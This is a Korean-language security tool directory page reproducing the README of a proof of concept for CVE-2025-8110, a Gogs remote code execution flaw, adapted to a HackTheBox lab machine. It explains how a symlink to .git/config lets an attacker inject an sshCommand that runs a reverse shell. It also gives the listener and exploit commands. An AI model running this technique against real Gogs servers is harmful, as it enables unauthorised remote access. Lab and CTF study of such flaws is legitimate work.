Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-8110-Silentium-HTB — CVE-2025-8110 HTB의 Silentium 박스 전용. | Kitploit
도구/GitHubGitHub/hassan-hamadi/cve-2025-8110-silentium-htb
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHubhassan-hamadi/cve-2025-8110-silentium-htb

CVE-2025-8110-Silentium-HTB

CVE-2025-8110 HTB의 Silentium 박스 전용.

저장소 보기
14개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-8110 — Gogs RCE PoC (Silentium / HackTheBox)

면책 조항: 이 도구는 교육 목적 및 승인된 침투 테스트용으로만 제공됩니다. 명시적 허가를 받은 시스템에 대해서만 사용하십시오.


이것은 zAbuQasem/gogs-CVE-2025-8110의 수정 버전으로, HackTheBox의 Silentium 시스템에서 작동하도록 조정되었습니다. 원래 PoC는 Silentium의 특정 Gogs 구성 및 인증 흐름을 처리하기 위해 수정이 필요했습니다.


취약점

CVE-2025-8110은 자체 호스팅 Git 서비스인 Gogs의 원격 코드 실행 취약점입니다.

Gogs의 파일 업데이트 API 엔드포인트(PUT /api/v1/repos/.../contents/<file>)는 대상 파일이 심볼릭 링크인지 확인하지 않습니다. 인증된 공격자는 .git/config를 가리키는 심볼릭 링크를 저장소에 푸시한 다음, API를 사용하여 악성 페이로드로 덮어쓸 수 있습니다. 페이로드는 Git 구성에 사용자 지정 sshCommand를 주입하며, Gogs가 해당 저장소에서 SSH 작업을 수행할 때 서버 측에서 실행되어 원격 코드 실행으로 이어집니다.


PoC의 기능

  1. Gogs에 인증하고 로그인 페이지에서 CSRF 토큰을 수집합니다.
  2. 사용자 설정 페이지를 통해 Gogs API 토큰을 생성합니다.
  3. SSH가 활성화된 상태로 API를 통해 새 저장소를 만듭니다.
  4. 저장소를 로컬에 복제하고 심볼릭 링크(malicious_link -> .git/config)를 생성하여 푸시합니다.
  • 심볼릭 링크에 대해 파일 업데이트 API를 호출하여 sshCommand = <reverse shell>이 포함된 악성 .git/config를 작성합니다.
  • Gogs는 심볼릭 링크를 따라가 자체 .git/config를 덮어쓰고, 다음 SSH 작업 시 쉘이 실행됩니다.

  • 사용법

    종속성 설치:

    root@kitploit:~
    pip install -r requirements.txt
    

    리스너 시작:

    root@kitploit:~
    nc -lvnp <PORT>
    

    익스플로잇 실행:

    root@kitploit:~
    python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>
    

    선택 사항 — Burp Suite를 통해 라우팅:

    root@kitploit:~
    python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
    
    플래그설명
    -uGogs 기본 URL
    -lh공격자 IP (리버스 쉘 호스트)
    -lp리스너 포트
    -un등록된 Gogs 사용자 이름
    -pwGogs 비밀번호
    -x(선택 사항) localhost:8080의 Burp를 통해 트래픽 라우팅
    도구 다운로드